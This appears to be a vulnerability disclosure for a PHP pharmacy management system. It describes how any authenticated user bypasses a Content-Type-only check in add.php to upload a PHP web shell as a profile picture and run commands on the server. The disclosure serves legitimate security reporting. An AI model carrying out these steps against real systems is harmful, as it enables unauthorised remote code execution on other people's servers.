What is Pharmacy Management System?
Software vendor: https://code-projects.org/pharmacy-management-system-in-php-with-source-code/
An attacker authenticated with any type of account (Administrator, Manager, Pharmacist, Salesperson) could exploit the vulnerability, potentially achieving remote code execution in the application and causing damage.
It was possible to locate at least one vulnerable point, specifically in the add.php file, when uploading a malicious file in the profile picture. However, the application performs a filter based on the Content-Type of the file to be sent.
The following image demonstrates a list of content-type validations in the add.php file:
Knowing this information, we can upload a malicious PHP file, as shown in the image below:
When uploading the image, it is necessary to replace the Content-Type of application/octet-stream with one of the options mentioned earlier in the code, in this case, I will use image/png. The following image demonstrates the Content-Type header replacement:
After that, just access the initial dashboard, right-click on your profile picture, and access the link in another tab. At this moment it will be possible to insert commands remotely from the selected parameter in PHP. The following image demonstrates the collection of the user from the local machine.